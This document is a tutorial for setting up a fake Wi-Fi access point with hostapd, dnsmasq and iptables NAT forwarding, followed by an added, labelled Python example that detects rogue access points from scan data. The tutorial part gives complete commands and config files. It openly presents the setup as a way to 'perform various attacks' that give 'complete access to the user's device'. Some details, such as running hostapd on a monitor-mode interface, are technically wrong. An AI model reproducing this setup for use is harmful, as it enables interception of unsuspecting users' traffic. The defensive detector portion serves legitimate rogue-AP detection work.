Fake Access Point
Installation
- apt update
- apt install hostapd dnsmasq
We need to put the wireless card in monitor mode to allow us to sniff the packets in and around the network. You can use this method:
- ifconfig wlan0 down
- iwconfig wlan0 mode monitor
- ifconfig wlan0 up
Or if that didn’t work, you can use this method instead:
- airmon-ng start wlan0
- mkdir /root/fap
- cd /root/fap
Once we are in the /root/fap directory that we created, we set up a new hostapd configuration file and write instructions inside it. Hostapd (host access point daemon) is a software access point that lets the user use their wireless adapter to broadcast several access points at the same time.
nano hostapd.conf
nano: A command-line text editor included in most Linux installations.
hostapd.conf: The name of the configuration file that we created.
Now, inside hostapd.conf, we need to write the following instructions.
interface=wlan0mon
driver=nl80211
ssid=[Name of the Wifi]
hw_mode=g
channel=[Channel number]
macaddr_acl=0
ignore_broadcast_ssid=0
After writing these instructions, press CTRL+X, then Y, then ENTER. Now we are all set for hostapd.conf.
interface: The name of the wireless adapter that we are using in monitor mode.
driver: The supported driver for hostapd.
ssid: The broadcasted Wifi name.
hw_mode=g: Simply instruct it to use 2.4GHz band.
channel: The channel number to use for the fake access point.
macaddr_acl=0: Tells hostapd to not use MAC filtering. [macaddr_acl=1] tells it to use MAC filtering.
ignore_broadcast_ssid=0: To make the fake access point visible and not hidden.
interface=wlan0mon
dhcp-range=192.168.1.2, 192.168.1.30, 255.255.255.0, 12h
dhcp-option=3, 192.168.1.1
dhcp-option=6, 192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
dhcp-range: IP address range for the connected network clients. 12h is the amount of hours until the lease expires.
dhcp-option=3: Gateway IP for the networks.
dhcp-option=6: For DNS Server followed by IP address
server: DNS server’s address
log-queries: Log the results of DNS queries handled by dnsmasq.
log-dhcp: Log all the options sent to DHCP clients and the tags used to determine them.
listen-address: Links the DHCP to the local IP address which is 127.0.0.1.
Now we need to assign the interface a network gateway and netmask and then add the routing table.
ifconfig wlan0mon up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
Start the DNS server by doing:
dnsmasq -C dnsmasq.conf -d
STEP 8:
To provide the users with internet access, we need to forward traffic from eth0, the virtual wireless adapter that is connected to the internet, to wlan0mon. This will help you perform various attacks that can give you complete access to the user’s device. If you don’t want the users to have internet access, skip this step.
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0mon -j ACCEPT
First command: The name of the interface that traffic is forwarded from.
Second command: The name of the interface that receives the packets, that is, the interface being forwarded to.
Now execute this command to enable IP forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
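Seen from the defending side, the hostapd.conf above sets no wpa options, so the resulting network is unencrypted and differs from the real one in BSSID, security mode or channel. The following is an added example, not part of the original guide: a check that compares Wi-Fi scan results against an inventory of authorised access points. The SSID, BSSIDs, inventory and scan records are constructed sample data, and the Beacon type and function names are hypothetical.

```python
# Added example: flag likely rogue access points in Wi-Fi scan results.
# KNOWN_APS and SAMPLE_SCAN are constructed sample data, not real networks.
from dataclasses import dataclass

@dataclass(frozen=True)
class Beacon:
    ssid: str
    bssid: str
    channel: int
    security: str  # "OPEN", "WPA2" or "WPA3"

# Inventory of authorised access points: SSID -> {BSSID: (channel, security)}
KNOWN_APS = {
    "CorpWiFi": {
        "aa:bb:cc:00:00:01": (1, "WPA2"),
        "aa:bb:cc:00:00:02": (6, "WPA2"),
    },
}

def check_beacon(b, known=KNOWN_APS):
    """Return the reasons a beacon looks suspicious (empty list if none)."""
    aps = known.get(b.ssid)
    if aps is None:
        return []  # not one of our SSIDs, out of scope
    reasons = []
    expected = aps.get(b.bssid.lower())
    if expected is None:
        reasons.append("unknown BSSID for protected SSID")
        # A hostapd.conf with no wpa settings yields an open network.
        if b.security == "OPEN" and any(s != "OPEN" for _, s in aps.values()):
            reasons.append("open network imitating encrypted SSID")
    else:
        channel, security = expected  # BSSID matches, so check for spoofing
        if b.security != security:
            reasons.append(f"security downgrade: expected {security}, saw {b.security}")
        if b.channel != channel:
            reasons.append(f"channel mismatch: expected {channel}, saw {b.channel}")
    return reasons

def find_rogue_aps(scan, known=KNOWN_APS):
    """Map each suspicious BSSID in the scan to its list of reasons."""
    return {b.bssid: r for b in scan if (r := check_beacon(b, known))}

SAMPLE_SCAN = [
    Beacon("CorpWiFi", "aa:bb:cc:00:00:01", 1, "WPA2"),    # authorised AP
    Beacon("CorpWiFi", "02:11:22:33:44:55", 6, "OPEN"),    # unknown BSSID, open
    Beacon("CorpWiFi", "aa:bb:cc:00:00:02", 11, "OPEN"),   # known BSSID, wrong settings
    Beacon("CoffeeShop", "de:ad:be:ef:00:01", 3, "OPEN"),  # unrelated network
]

if __name__ == "__main__":
    for bssid, reasons in find_rogue_aps(SAMPLE_SCAN).items():
        print(bssid, "->", "; ".join(reasons))
```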